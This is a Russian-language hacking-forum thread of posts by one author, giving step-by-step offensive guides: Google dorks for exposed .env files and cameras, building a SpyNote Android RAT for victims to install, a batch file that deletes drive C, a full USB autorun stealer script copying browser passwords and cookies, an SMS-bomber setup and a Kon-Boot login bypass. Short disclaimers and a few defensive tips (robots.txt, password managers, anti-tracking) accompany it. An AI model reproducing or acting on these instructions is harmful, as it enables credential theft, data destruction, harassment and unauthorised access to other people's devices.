Если владелец веб-сайта не использует файл robots.txt для блокировки определенных ресурсов, то Google проиндексирует всю информацию, которая находится на нем. Логично предположить, что через какое-то время любой человек в мире получит доступ к этой информации, если будет знать, что искать и как искать.
Предотвращение Google Dork
Но существует множество способов, как избежать попадания в руки Google Dork. Это делается для того, чтобы избежать индексации вашей конфиденциальной информации поисковым системам.
Шифрование. Не забудьте про шифровку вашей личной информации (пользователя, пароли, данные кредитных карт, почту и т.д.). Вы можете предотвратить попадание ваших файлов в Google Dork, зашифровав их.
Проверка Dorks. Постоянно проверяйте уязвимости на сайте, они часто используются для поиска наиболее популярных запросов Google Dorks. Отправляйте регулярные запросы на свой сайт, чтобы узнать, сможете ли вы отыскать какую-либо важную информацию до того, как это сделают хакеры. В базе данных Exploit Db Dorks вы найдете большой список популярных dorks.
Удаление. После того, как вы обнаружили уязвимый контент, вам необходимо отправить запрос на удаление с помощью Google Search Consolet.
Robots.txt. При помощи файла robots.txt блокируйте доступ к конфиденциальному контенту.
Применение конфигурации robots.txt для устранения Google Dorks
Самый лучший способ обезопасить себя от Google dorks – это использовать файл robots.txt. Рассмотрим несколько примеров.
C помощью следующей конфигурации любое сканирование на вашем сайте будет запрещено, что крайне важно при использовании сайта частного доступа.
User-agent: *
Disallow: /
Кроме того, вы можете заблокировать определенные каталоги, в которых будет исключена возможность сканирования. Чтобы защитить область / admin от злоумышленников введите этот код внутри:
User-agent: *
Disallow: /admin/
Также это обезопасит все внутренние подкаталоги.
Для ограничения доступа к определенным файлам введите:
User-agent: *
Disallow: /privatearea/file.htm
Ограничить доступ к динамическим URL, которые содержат символ "?"
User-agent: *
Disallow: /*?
Чтобы ограничить доступ к определенным расширениям файлов, используйте:
User-agent: *
Disallow: /*.php$/
При таком раскладе доступ ко всем файлам .php будет запрещен.
Вывод
Google - один из самых популярных поисковиков в мире, который, как все знают, может найти практически все. Однако, мы выясняли, что Google может быть использован как хакерский инструмент, если вы не будете на шаг впереди злоумышленников. Крайне важно уметь использовать его для поиска уязвимостей на вашем сайте, чтобы это потом не обернулось против вас. Зная и применяя вышеописанные способы, Google Dork может стать полезным и практичным помощником для вас.
BlackMAST
30.05.2022, 17:06
https://i.gyazo.com/d07833aff43df6377a7b68733ff0fe93.jpg
Вступить в наш чат
В сегодняшней статье мы продолжаем разбирать методы взлома Google, также известные как Google Dorks. Ранее мы узнали, как с помощью дорков получить данные о логинах и паролях, искать FTP-серверы и веб-сайты, а также закрытые ключи SSH.
Читать первую часть
https://i.gyazo.com/8c7f9d8fc80c5aa0e76ec1de47bdccc1.jpg
Электронная почта
Списки email часто создаются для того, чтобы организовать людей в одну группу. Эти списки находятся в общем доступе, которые мы сейчас и будем искать.
Найти списки email с помощью Google Dorks довольно легко. В следующем примере мы собираемся получить файлы Excel, которые могут содержать много адресов электронной почты.
filetype:xls inurl:"email.xls"
https://i.gyazo.com/fa2f7d16e58f1181791675952b62e6a6.jpg
Однако стоит отметить тот факт, что некоторые люди специально оставляют в дырке вредоносное ПО. Скачав таблицу с адресами электронной почты, можно легко словить вирус.
Вы заметите, что незашифрованные имена пользователей, пароли и IP-адреса напрямую отображаются в результатах поиска. Вам даже не нужно нажимать на ссылки, чтобы получить данные для входа в базу данных.
ENV файлы
Файл .env позволяет настраивать отдельные переменные вашей среды и используется популярными средами веб-разработки.
Эти файлы (*.env) необходимо перемещать в недоступное для общего круга лиц место. Тем не менее, используя следующий дорк, вы поймете, что многие разработчики не позаботились об этом, поэтому файлы .env находятся в Google.
ext:env intext:APP_ENV= | intext:APP_D***G= | intext:APP_KEY=
Открытые камеры
Можете ли вы себе представить, что вашу личную жизнь в онлайн режиме могут смотреть абсолютно незнакомые пользователи в интернете?
Следующие методы взлома Google могут быть использованы для получения веб-страниц камер в реальном времени, которые не ограничили IP.
Вот dork, чтобы получить различные IP-камеры:
inurl:top.htm inurl:currenttime
https://i.gyazo.com/cbf9a7c13fee4966643a2ff51ba141bf.jpg
Чтобы найти трансляции на основе WebcamXP:
intitle:"webcamXP 5"
https://i.gyazo.com/2654453b47f51d64c63581c3ce5da137.jpg
И еще один дорк для обычных живых камер:
inurl:"lvappl.htm"
https://i.gyazo.com/4f0c475292580a412930fe897266d379.jpg
https://i.gyazo.com/32f43c9fcd2f7a4cf347d1c2894c1f97.jpg
В интернете есть множество онлайн-камер, с помощью которых вы можете вживую смотреть любую часть мира. В доступе без IP-ограничений находятся не только обычные камеры, то и даже военные и правительственные. При большом желании вы даже можете получить доступ к этим камерам, используя белый хакинг. Вы не только сможете дистанционно управлять всей панелью администратора, но и перенастроить ее по желанию.
Заключение
Google Dork - это Cвятой Грааль среди всех поисковых запросов Google. Они позволяют любому человеку получить доступ к нужной информации при условии, что вы умеете ее находить. Зная о возможностях дорков, вы можете использовать их во благо, будь-то защита своих данных или же поиск определенной информации.
Читайте здесь, как предотвратить Google Dork.
ВСЯ ИНФОРМАЦИЯ ПРЕДОСТАВЛЕНА В ОЗНАКОМИТЕЛЬНЫХ ЦЕЛЯХ, МЫ НЕ ПРИЗЫВАЕМ К ДЕЙСТВИЮ
BlackMAST
02.06.2022, 17:57
https://i.gyazo.com/b4f6aae70d584d928b95313b199d66d1.jpg
Вступить в наш чат
Ежедневно каждый человек сталкивается с рекламой в компьютере или телефоне, при чем большая часть увиденного наверняка вызывает интерес. А теперь вспомните, искали ли вы недавно какой-либо продукт из рекламы? Или может быть вы говорили про него с кем-то? Первый вопрос, который сейчас должно быть одолевает вас: "Как это работает?".
Ответ - Cross-device tracking.
Cross-Device Tracking - еще одна малоизвестная технология для отслеживания. Из названия можно сделать вывод о том, что принцип работы заключается в отслеживании пользователей параллельно с нескольких устройств. Этого можно добиться благодаря использованию высокочастотных звуков, которые не могут быть услышаны человеческим ухом. Проще говоря, Cross-Device Tracking может быть сравним со звуковым маячком для слежения.
https://i.gyazo.com/f58b2ca5b462f0f7712e91256a961e62.jpg
Для чего и кому это нужно
В первую очередь наибольший интерес Cross-Device Tracking представляет для маркетинговых компаний, которые всегда в поиске новых способов внедрения персонализированной рекламы. Ведь прибыль компании напрямую взаимосвязана с удовлетворением интересов потребителя. Хотя сами потребители не в восторге от идеи, что каждый их шаг фиксируется, и блокируют рекламу на своих устройствах, компании придумывают все новые способы для слежки, агрессивнее прежних.
Однако не только маркетологи оценили Cross-Device Tracking: данный метод отслеживания показался очень эффективным для деанона киберпреступников,которые даже используютTor, VPN и proxy.
Принцип работы Cross-Device Tracking
Чтобы понять как себя защитить, вы должны быть знакомы с принципом его работы. Эта технология работает не только с одним вашим устройством, а одновременно со всеми,такимикак компьютеры, телефоны, телевизоры и т.д. Таким образом создается комбинированный профиль для каждого пользователя, деанонимизирующий его.
https://i.gyazo.com/95bfb528e249f762cfc5d146d8b8f6d8.jpg
В качестве примера рассмотрим ситуацию:
Вы используете надежное соединение на компьютере VPN + Tor + proxy, занимаетесь своими делами в интернете, как вдруг раздается какой-то звук на сайте. В это время ваш телефон слышит тот же самый сигнал и вот, что происходит дальше. Допустим, разработчик голосового помощника на вашем телефоне или любое приложение, у которого есть доступ к микрофону, сотрудничает со спецслужбами. Информация, полученная с устройства, ваш IP-адрес и координаты будут незамедлительно переданы в систему для дальнейшего анализа. Конечно, на вашем компьютере есть полный анонизирующий пакет, но ваш телефон не был защищен таким же образом. Но это вы зря, надо было учесть все.
Заключение
Как нам всем известно, вычислить человека по одному лишь IP-адресу совсем не легко, чего не скажешь про технологию сross-device tracking. С помощью телефона или любого другого утройства вы можете преподнести все данные о себе на блюдечке - и номер телефона, и контакты, и координаты а также историю разговоров/СМС, и многое другое - этого хватит с лихвой, чтобы установить личность.
Можно ли защитить себя от сross-device tracking? И ответ положительный. О способах остановить слежку мы расскажем в следующей части.
BlackMAST
06.06.2022, 13:24
https://i.gyazo.com/d094ec6225aedf075f13b0f811e39d75.jpg
Вступить в наш чат
Раннее мы рассказали про относительно новый метод слежки, объяснили принцип его работы, а также затронули его опасностьдля пользователей Tor, VPN, proxy.
Читать первую часть
Коротко напомним, что cross-device tracking - это технология отслеживания пользователей с помощью нескольких устройств.
Возможно, вас не беспокоит факт того, что за вами следят, и вам вообще по барабану, кто там и что собирает о вас. Но если все-таки вы не согласны быть героем "Шоу Трумана", то самое время помешать этому.
https://i.gyazo.com/aae8b505090f199cef551b6eebbf17e0.jpg
Как остановить cross-device tracking
Не стоит думать, что вы не в силах противостоять слежению. Вовсе нет. Вы можете предотвратить это с помощью следующих мер.
Отключите микрофон
Первое и самое необходимое, что нужно сделать - это отключить динамики или в настройках, или оборвав провода. Последнее необязательно, если вы, конечно, не Эдвард Сноуден. Для простых смертных больше подойдет первый способ, то есть ограничить доступ к микрофону. Но тут появляется проблема – нет возможности полноценно пользоваться устройством, особенно это касается телефона. Покуда есть приложения, которые блокируют микрофон в целом, то могут возникнуть проблемы с удобством использования. Например, каждый раз при звонке нужно будет включать микрофон.
Но тут уже сами решайте, что для вас важнее - анонимность или удобство.
Используйте VPN
Еще один отличный способ уберечь себя от отслеживания - использовать VPN. Почему? VPN - это инструмент, который скрывает ваш реальный IP-адрес и местоположение. Как правило, все веб-сайты и приложения, которые вы посещаете, определяют ваше местоположение. При использовании VPN оно будет для них недоступно.
Важно: используйте VPN на всех своих девайсах, не только на компьютере.
Скачайте анонимный браузер
Думаете, что режим инкогнито безопасен? Вы глубоко ошибаетесь. Если вы действительно хотите защитить себя от слежки, то разумнее будет использовать анонимный браузер, такой как Brave, Tor, DuckDuckGo. В отличие от Google и Яндекс, эти браузеры не отслеживают вас и не сохраняют ваши личные данные для дальнейшего обмена с третьими лицами.
Измените разрешения приложения
Зачем Google Chrome доступ к вашему микрофону и местоположению? Если у приложений в вашем телефоне есть полный доступ к тому, что не требуется для использования, то самое время отклонить эти разрешения.
Радикальный метод
И напоследок самый эффективный способ избежать слежки, который маловероятно вам понравится - вовсе отказать от смартфона. Купите обыкновенный кнопочный телефон или же специальный, ориентированный на безопасность. Они имеют очень ограниченный функционал и список установленных приложений. Это же касается и планшета.
Заключение
В современном мире конфиденциальность уже не такая, как была несколько лет назад. Крупные компании, правоохранительные органы используют различные инструменты и методы для отслеживания ваших действий в Интернете. Такое вторжение в личное пространство мало кому придется по душе. Но к счастью, пока что еще есть возможность оградить себя от этого.
BlackMAST
13.06.2022, 16:14
https://i.gyazo.com/f73665bd28902959c5637e1a2e2cc8fa.jpg
Вступить в наш чат
В прошлой части мы уже затрагивали тему взлома Android пользователей. В этот раз речь пойдет про другой, более продвинутый вариант хакинга, который работает через интернет.
Если вы пропустили предыдущую часть, то советуем начать именно с нее.
Читать "Как хакнуть любой Android смартфон"
https://i.gyazo.com/3eb8f31b99d29a2172aad6b890afd1d8.jpg
Что потребуется?
Требования те же самые, как и для предыдущего способа, за исключением двух моментов.
Java;
Spynote;
Роутер с функцией проброса портов или переадресации портов. Это необходимо именно для взлома через интернет;
Динамический IP-адрес.
Итак, начнем.
Перейдите на noip.com и зарегистрируйтесь.
https://i.gyazo.com/e24d560416f989544390d5d6a0c79b3d.jpg
Далее кликните "Add Host", вводите любое имя и сохраните.
https://i.gyazo.com/68f0839bd848abd3751551b562bd6685.jpg
Загрузите DUC (Dynamic DNS Update Client) с официального сайта или нажмите здесь. Установите DUC и войдите в свою учетную запись. Как только вы это сделаете, IP-адрес вашей системы будет автоматически обновлен в DNS. Если этого не произошло, вы можете настроить DNS вручную.
https://i.gyazo.com/bbced98632d6b5b7704c4f44fdef7126.jpg
Нажмите "Add Host" в DUC, как показано на скрине. Если все сделано правильно, то высветятся все три зеленые галочки.
https://i.gyazo.com/904451ae954d39f2fc204e3222595aa4.jpg
Далее нам нужен IP-адрес шлюза для проброса портов из настроек нашего роутера. Поэтому введите "ipconfig" в командной строке, и вы получите IP-адрес шлюза.
https://i.gyazo.com/d01ab222c17bdd589a4d6be45a174a9d.jpg
Откройте любой браузер и вставьте туда IP шлюза. Откроется страница входа в систему. Введите имя пользователя и пароль вашего роутера (по умолчанию для большинства роутеров оба имени - admin).
Теперь перейдите к опции проброса портов. В зависимости от модели роутера, информация на скриншоте может отличаться, но принцип работы будет один и тот же.
https://i.gyazo.com/da2cbbee95f7247dae34bc5f2ef2c466.jpg
Нажмите "Добавить порт" -> "Добавить порт 2222" и сохраните его. Вы можете указать любой номер порта, какой пожелаете.
Cледующим шагом откройте файл spynote.exe, и он запросит у вас номер порта. Введите 2222 в качестве номера порта. И нажмите сохранить. Настройки роутера будут обновлены.
Добавьте все необходимые данные: имя клиента, название приложения, служба и версия. Вам нужно установить такое же имя хоста, как то, которое вы задали в клиенте NOIP в настройках DNS.
Как только вы закончите с этим, кликните на кнопку "Build".
https://i.gyazo.com/bd46ab598a55b847505b799bc157cb78.jpg
Теперь apk будет создан в папке spynote C:\Building-6.1\apktool\out.
https://i.gyazo.com/5bd32aed42175620b454374d06b59918.jpg
Готово. Остается только подключить творческий подход, чтобы заставить жертву установить apk на свое устройство.
Вся вышеизложенная информация предоставлена в ознакомительных целях. Мы не призываем к действию.
BlackMAST
20.06.2022, 15:39
https://i.gyazo.com/44dc59d55f4d3434aaeab0e9e09f6081.jpg
Вступить в наш чат
Cооснователь Ethereum Виталик Бутерин недавно рассказал о своём новом проекте – Soulbound Tokens (SBT) или токены, связанные душами.
Cегодня мы разберёмся в этом явлении. Вы узнаете в чем суть этих токенов, для чего они нужны и когда появятся.
https://i.gyazo.com/0d46c19996641367288f7f7825edb257.jpg
Что такое SBT
Аббревиатура SBT расшифровывается как Soulbound Tokens, что в переводе означает «Связанные душой токены». Пошло такое название из игры World of Warcraft, словом «Soulbound» назывался отдельный класс предметов, которые можно было получить за внутриигровые достижения, например, за победу над противником.
В отличие от игры, в реальной жизни Soulbound действуют как показатели ваших достижений, только вместо профиля игрока, они будут привязываться к крипто-кошельку пользователя. SBT точно так же, как ваше резюме, представляют ваши навыки, опыт работы, образование и квалификацию. На основе всего этого, можно получить представление о ваших способностях.
Отличие NFT от SBT
Основное отличие от NFT заключается в том, SBT не подлежат передаче и, следовательно, не могут быть приобретены посредством торговли. Каждый SBT навсегда привязывается к кошельку.
Сферы применения
Искусство. SBT значительно облегчат жизнь NFT-художникам, так как никто не сможет присвоить себе авторские права на чужую работу. Также для того, чтобы разрекламировать свой NFT, художнику приходится заводить аккаунт в Twitter, Instagram и на многих других площадках. Однако, если у художника будет свой Soulbound Token, то соцсети и биржи станут попросту не нужны.
Маркетинг. Кроме искусства можно представить использование SBT в любых сферах, где требуется проверка подлинности, например, рынок аренды или покупки недвижимости, где многое значит репутация продавца и достоверность данных, которые он предоставляет о своем объекте.
Образование. Когда NFT только начали набирать популярность, шли разговоры о том, что учебные заведения через N-количество лет будут выдавать дипломы в виде NFT, но здесь возникла несостыковка: если NFT можно продать другому человеку, то, соответственно, то же самое можно проделать и с дипломом. Но тут в дело вступают Soulbound Tokens – с ними купить образование или другого рода достижения не получится. Прямая проверка подлинности даст возможность избежать ряд проблем, так как использование технологий блокчейна поможет определить авторство, время, дату получения и другую информацию.
https://i.gyazo.com/f7cb459f1ac1292553598e611c66429d.jpg
Как могут присваиваться SBT
Самостоятельно. Вы можете заполнить и подтвердить информацию о себе, содержащую данные об образовании, стаже работы, творчестве.
Пользователями. Такие SBT могут быть получены и подтверждены участниками, с которыми вы взаимодействовали — например, за помощь другому пользователю.
Организаторами событий. Это будет своего рода сертификат, подтверждающий участие. Например, за участие в конференции, за прохождение обучения и т.д.
Таким образом, у крипто-кошелька пользователя начнет формироваться своя история и репутация. Можно будет наблюдать, где он обучался, в каких мероприятиях участвовал, кому помогал и где работал.
Когда появятся SBT?
По оценке Виталика Бутерина, первые SBT появятся к концу 2022 года. А к 2024 году они уже станут трендом. Выпускать их смогут как обычные пользователи, так и организации, включая DAO.
Заключение
Soulbound tokens презентовали себя как передовую технологию, позволяющую развить цифровое портфолио, сформировать и укрепить репутацию и сделать пользовательские отношения более прозрачными и надёжными. Хотя нам еще предстоит узнать, как именно SBT повлияют на цифровое пространство, но мы уже точно можем сделать вывод о том, что они изменят мир криптовалюты.
BlackMAST
20.06.2022, 15:39
https://i.gyazo.com/e7b424c324366a316e84961f9303d10f.jpg
Вступить в наш чат
Задумывались ли вы когда-нибудь как создаются вирусы на ПК? Вы будете удивлены, узнав, что для этого вам не нужны никакие знания о языках программирования. Все, что вам потребуется - это блокнот и пара, написанных строк, о которых мы расскажем в этой статье. Это очень просто. Давайте начнем!
https://i.gyazo.com/aea5a62e53041d5945d809155e678aa4.jpg
Что такое .bat
Для начала разберём немного теории, которая нам впоследствии понадобится. Не все знают, что в блокноте можно написать простые вирусы в формате .bat. Что это за файл такой?
.bat — текстовый файл в MS-DOS, OS/2 или Windows, содержащий последовательность команд после запуска которых, программа-интерпретатор начинает их исполнять.
Как создать файл .bat:
Открыть блокнот или иной текстовый редактор;
Ввести нужные команды;
Сохранить файл с расширением .bat (Например: virus.bat)
Итак, приступим к созданию вируса с помощью блокнота.
Опасный вирус
Дисклеймер
Вся информация, приведённая ниже, представлена лишь в ознакомительных целях. Не пытайтесь повторить это, так как это может полностью уничтожить компьютер за считанные секунды.
Для начала вам нужно открыть блокнот.
Далее скопируйте и вставьте приведенный ниже код на экран блокнота.
Echo (https://forum.antichat.xyz/members/812226/) offDel C: *.* |y
Сохраните этот файл под любым именем, но обязательно в формате .bat.
При запуске этого файла, операционная система и диск С будут уничтожены без возможности восстановления.
Этот метод предназначен только для ознакомительных целей. Не пытайтесь сделать это на своем компьютере, так как это полностью отформатирует ваш диск C.
Вирусы-розыгрыши
1. Создаем экран как в «Матрице»
Данный вирус абсолютно безопасен, потому что на самом деле это больше трюк с блокнотом, не имеющий отношения к реестру компьютера. Используя этот способ, вы можете запустить матричный экран со случайной последовательностью цифр.
Откройте блокнот и введите в него следующий код:
Echo (https://forum.antichat.xyz/members/812226/) offcolor 02:startecho %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%goto start
Теперь сохраните файл как под названием Matrix.bat;
Откройте файл и почувствуйте себя “избранным”.
Данный трюк может быть использован в качестве розыгрыша друзей.
2. Отключаем доступ к Интернету
Это еще один неопасный способ, который вы также можете продемонстрировать друзьям.
Откройте блокнот;
Скопируйте и вставьте, ниже указанный код:
Echo (https://forum.antichat.xyz/members/812226/) off Ipconfig / release
Сохраните файл под любым именем, но обязательно в формате.bat;
Как только файл будет открыт, IP-адрес потеряется;
Чтобы вернуть все, как было, введите в cmd команду «Обновить» или «IPconfig», и проблема будет решена.
BlackMAST
23.06.2022, 15:32
https://i.gyazo.com/5e19694f1ae3e5ddb16d37c51e764535.jpg
Вступить в наш чат
В этой статье мы расскажем о том, как легко можно украсть учётные записи и пароли браузера с помощью флешки. А так же поговорим, как защитить себя от подобных атак.
https://i.gyazo.com/2c4a4f42c9fe7b25f1143b2b0fefd3ee.png
Cookie-файлы – зашифрованные текстовые документы, содержащие информацию о пользователе: статистику, персональные настройки, сохранённые логины и пароли, а также многое другое.
Что это может дать?
Вариантов применения очень много, все лишь зависит от вашей изобретательности. Если вы студент или школьник, то с помощью этого способа вы можете украсть данные препода, тем самым первым узнать о предстоящих контрольных и проверочных работах. Вы также можете проверить вторую половинку или наказать недоброжелателя.
Итак, переходим к пошаговой инструкции:
Создаём cookie-стиллер
1.В первую очередь вам, конечно же, потребуется любая флэшка, где мы создадим следующие текстовые файлы:
autorun.inf
и
stealer.bat
Не забудьте изменить расширения этих файлов с txt на inf и bat.
2. В файле autorun.infвводим:
Open="stealer.bat"
А в файле stealer.batпишем:
@echo off
md %~d0\Mozilla
md %~d0\0pera
md %~d0\Google
md %~d0\Yandex
md %~d0\Amigo
CD/D %APPDATA%\Opera\Opera\
cls
copy /y wand.dat %~d0\Opera\
copy /y cookies.dat %~d0\Opera\
cd %AppData%\Mozilla\Firefox\Profiles\*.default
copy /y cookies.sqlite %~d0\Mozilla
copy /y key3.db %~d0\Mozilla
copy /y signons.sqlite %~d0\Mozilla
copy /y %AppData%\Mozilla\Firefox\Profiles\*.default %~d0\Mozilla
cd %localappdata%\Google\Chrome\User Data\Default
cls
copy /y "%localappdata%\Google\Chrome\User Data\Default\Login Data" "%~d0\Google"
cd %localappdata%\Yandex\YandexBrowser\User Data\Default
copy /y "%localappdata%\Yandex\YandexBrowser\User Data\Default\Login Data" "%~d0\Yandex"
cd %localappdata%\Amigo\User Data\Default
copy /y "%localappdata%\Amigo\User Data\Default\Login Data" "%~d0\Amigo"
cls
ATTRIB -R -A -S -H
attrib +h %~d0\Mozilla
attrib +h %~d0\Opera
attrib +h %~d0\Google
attrib +h %~d0\Yandex
attrib +h %~d0\Amigo
attrib +h %~d0\search.bat
attrib +h %~d0\new
attrib +h %~d0\autorun.inf
del: autorun.inf?
Стиллер готов. Сохраняем и закрываем.
Но что же делать после того, как вы украли куки? Все просто.
3.Нажимаем Windows+R и вводим:
%appdata%
4. Свои куки на СВОЁМ компьютере удаляем, либо временно скидываем на флешку. А на их место копируем полученные.
5. Теперь скачиваем программу WebBrowserPassView. Здесь уже ничего не надо нажимать - программа сама загрузит и расшифрует куки из ваших браузеров. Просто открываем ее и видим сайты с учётными записями и паролями к ним.
Как защитить себя от cookie-стиллера
Никогда не храните пароли в браузере! Уж лучше в тетрадке под кроватью. Хранить пароли в браузере очень опасно. Но что же делать?
Если вы не можете положиться на свою память, то у вас есть два варианта для хранения:
Бумага. Самый традиционный и безопасный способ, если при этом хранить в недоступном месте.
Софт для хранения паролей. Если вы до сих пор записываете пароли в текстовом документе/блокноте на ПК, то знайте, что это ни чем не лучше браузера. Вместо этого используйте специальное программное обеспечение для хранения паролей. Например, софт KeePassX, который распространяется бесплатно на базе лицензии GPL и имеет открытый исходный код.
Вся вышеизложенная информация предоставлена в ознакомительных целях. Мы не призываем к действию.
BlackMAST
04.07.2022, 15:46
https://i.gyazo.com/abcd1402bff36856152b60f65ad992df.jpg
Вступить в наш чат
В сегодняшней статье мы расскажем как перегрузить телефон жертвы спамом. Данный способ является очень действенным и даже может вывести телефон из строя на время.
Дисклеймер: Вся информация, опубликованная в этой статье, предоставлена лишь в ознакомительных целях. Мы ни к чему не призываем и не несём ответственности за ваши действия.
https://i.gyazo.com/b81768236e723396b001630408dd8a92.jpg
СМС-бомбер - это ПО для массовой рассылки сообщений на заданный номер телефона. СМС-атака зачастую используется как способ отвлечения внимания жертвы при осуществлении взлома социальных сетей, кражи денег с кредитки или просто как метод психологического давления.
1-й способ - на компьютере
В первую очередь вам необходимо скачать и установить две программы:
Python;
Git:
Как только завершится установка, откройте Git и нажмите правой кнопкой мыши по рабочему столу, выбрав "Git Bash Here".
https://i.gyazo.com/67601cbad522babf17eef4e10d397cc7.jpg
Следующим действием прописываем команды:
git clone https://github.com/crinny/b0mb3r
Далее заходим в папку с бомбером:
cd b0mb3r
Теперь устанавливаем библиотеку:
pip install -r requirements.txt
И запускаем:
python main.py
В браузере откроется вкладка с бомбером, где вам нужно будет заполнить поле:
https://i.gyazo.com/2d468733e1d4fd4bc7d12bb6f16efb80.jpg
2-й способ - на телефоне
Вы также можете выполнить установку смс бомбера на телефоне.
Для этого скачиваем Termux.
После установки пишем эти команды:
pkg update && pkg upgrade (обновляем пакеты)
pkg install python (устанавливаем Python)
pkg install git (устанавливаем Git)
git clone https://github.com/crinny/b0mb3r (клонируем репозиторий)
cd b0mb3r (переходим в директорию с бомбером)
pip install -r requirements.txt (устанавливаем библиотеку)
python main.py (запускаем)
Если браузер не открывается, тогда скопируйте следующую ссылку:
https://i.gyazo.com/477fc39ec4496933de9d52795ad2d801.jpg
И затем ее вставляем в адресную строку браузера:
https://i.gyazo.com/e3b52a9e7c99dfb286be83cb9bc2a985.jpg
Теперь у вас откроется та же самая вкладка, как в 1-ом способе. Заполните поле и атака начнётся.
https://i.gyazo.com/1f4cca3d31fc4a77d8c2a7e8dfe502f4.jpg
__________________
BlackMAST
07.07.2022, 11:49
https://i.gyazo.com/2a908c9845981b5d661bb6a63cbbb8e4.jpg
Вступить в наш чат
Хотите узнать, как войти в компьютер другого человека, не зная при этом пароля? Да так, чтобы жертва еще не догадалась о ваших планах? Звучит интригующе? Тогда сядьте поудобнее и приготовьтесь к прочтению нашего простого мануала. И нет, вам не нужно быть профессиональным хакером или программистом, чтобы провернуть все это. Мы расскажем как просто проникнуть в ПК с помощью одной лишь программы - Kon-Boot.
https://i.gyazo.com/d3934d9194253232c91771be183c7012.jpg
Kon-Boot — программа, временно изменяющая содержимое ядра Windows. Она позволяет войти в учётную запись без пароля, не сбрасывая его. При повторном включении содержимое ядра восстанавливается, и снова запрашивается пароль, поэтому пользователь ПК ничего не заметит.
Для того, чтобы провернуть все это вам потребуется:
1. USB-накопитель;
2. Программа Kon-Boot. Скачать здесь.
Установка программы Kon-Boot на флешку
Вставляем флешку в USB разъём.
После того как вы распаковали программу, откройте папку Kon-Boot for Windows 2.5.0 и запустите файл KonBootInstaller от имени администратора.
https://i.gyazo.com/dc0dfefc53a6ebdaabaf929e2b113943.jpg
Далее появится окно с предостережением о том, что в ПК должна находится только одна флешка, иначе во время установки может быть выдана ошибка. Если готовы к установке, то подтвердите.
В разделе Available USB drivers из выпадающего списка выберите флешку и нажмите Install to USB stick (with EFI support).
https://i.gyazo.com/deb4bceffb7e68c18d332007a9b06565.jpg
Имейте ввиду, что вся информация, за исключением программы Kon-Boot, во время установки будет утеряна. Если на флешке ничего важного не осталось, то жмём «Да».
https://i.gyazo.com/8f25b68b1d283fd8da530fe2b950e8ed.jpg
Теперь запустится установка:
https://i.gyazo.com/b94df7867ce212d32872b5fe865cedde.jpg
Если вы столкнётесь с ошибкой:
Fatal: unable to copy C:\Kon-Boot for Windows 2.5.0\kon-bootUSB\USBFILES\menu.lst to G:\menu.lst, error = 0x00000002 (file exists=0)
То переименуйте файл konboot.lst в menu.lst, после чего заново запишите Kon-Boot на флешку через KonBootInstaller.exe,тогда ошибка будет устранена.
По завершению установки, нажмите «Оk».
https://i.gyazo.com/3c86881a5e09b18d26f3e6ac0c77ec90.jpg
Запуск флешки на ПК
Вставляем USB-накопитель с программой в разъём и запускаем ПК.
Далее вызываем Boot menu. На разных материнских платах клавиши вызова Boot menu отличаются, поэтому сверьтесь с таблицей ниже:
https://i.gyazo.com/67b148281f3306cfc2df28fb87d42d0e.jpg
Если же вы не знаете какая материнка стоит на компьютере, то обесточьте его и откройте боковую крышку системного блока, там вы найдёте модель.
https://i.gyazo.com/2b663658c08b01c3e35a5bcefae7521e.jpg
выбираем загрузку с флешки и кликаем «Enter».
В новом окне выберите Kon-Boot (CURRENT VERSION) и нажмите «Enter».
Далее на экране появится надпись Kon-Boot, после чего начнётся загрузка Windows.
https://i.gyazo.com/67a2ef80980ed31e4a146fece0ec252f.jpg
Если на экране появилась надпись «No Systemdisk. Booting from harddisk. Start booting from USB device…» — переустановите Kon-Boot используя KonBootInstaller.exe.
Если же на экране появилась надпись «Dummy bios detected trying to fix smap entries» — Вам необходимо в настройках BIOS выключить опцию Secure boot, а также включить опции Load Legacy Option Rom / CSM.
Когда ПК запросит пароль, оставьте поле пустым, либо введите случайные символы (Windows примет их как за правильный пароль) и нажмите «Enter».
Готово! Вы успешно обошли пароль. При повторном включении компьютера, все вернётся на свои места.
Вся информация в этой статье написана исключительно в ознакомительных целях.
BlackMAST
11.07.2022, 18:29
https://i.gyazo.com/02ce4590e35ce060f41e761e0ac398f1.jpg
Вступить в наш чат
Ни для кого не секрет, что информация о транзакциях в блокчейне является общедоступной, а адрес криптокошелька легко соотнести с личностью пользователя, поэтому можно сделать вывод о том, что большинство криптовалют не анонимны. Но позитивным моментом является тот факт, что существует ряд криптовалют, ориентированных на приватность. Одной из таких является Ghost. В этой статье мы расскажем чем же отличается эта криптовалюта от любой другой и правда ли она полностью конфиденциальна.
https://i.gyazo.com/5781163301fb777308781b256ca84a04.jpg
На момент появления Биткоина в 2009 году считалось невозможным определить личность владельца криптобиржи. Однако, сейчас мы знаем о том, что любой человек может отслеживать путь перемещения биткоинов в блокчейне и сопоставлять адреса кошельков с конкретными личностями.
Но с тех пор прошло много времени и компании пересмотрели концепцию анонимной криптовалюты. Для наглядности давайте посмотрим на очевидные отличия GHOST от других не менее популярных криптовалют :
https://i.gyazo.com/44e8a230a212ee1feeb0a775cde9d5cd.png
Итак, протокол Dandelion, он же одуванчик, делит транзакции на две части:
«Стебель». Данные переходят от 1-го узла ко 2-му рандомное количество раз. Иначе говоря, передаются от одного человека к другому.
«Пух». Последний, у кого они оказались, рассылает их по всей сети. Так, как это бы происходило в обычном блокчейне.
Появляется элемент непредсказуемости, поэтому невозможно отследить изначальный источник отправления. Как видно из таблицы, похожий протокол применяется лишь в Monero.
Cold-Staking. Стейкинг — это блокировка своей криптовалюты для получения дальнейшей прибыли. Обычно для стейкинга нужно находится в онлайне и раскрывать адрес своего кошелька. Но в Ghost этот момент решается с помощью холодного стейкинга без подключения к интернету. Это помогает сделать процесс стейкинга более конфиденциальным.
Ghost Pay. Как и у всех анонимных криптовалют, Ещё одним отличием Ghost от других криптокошельков является возможность получать и отправлять криптовалюту прямо внутри Telegram бота @GhostPayBot.
Где покупать Ghost
Практически на всех криптобиржах есть обязательная верификация личности. Чтобы сохранить анонимность, необходимо покупать криптовалюту с осторожностью. Вот список конфиденциальных способов купить GHOST:
TradeOgre. Эта криптобиржа ориентируется на конфиденциальность и не разглашает информацию о своих клиентах третьим лицам. Если вы хотите зарегистрироваться на ней, вам понадобится электронная почта и аутентификатор — приложение, генерирующее код входа. GHOST торгуется в паре с BTС, а комиссия составляет 0,01 GHOSТ.
HotBit.Эта биржа является одной из крупнейших в мире по объёму торгов. Чтобы зарегистрировать, необходимо подтвердить телефон. GHOST торгуется с тремя другими криптовалютами: USDT, BTC и ETH. Комиссия за вывод составляет 11 GHOST.
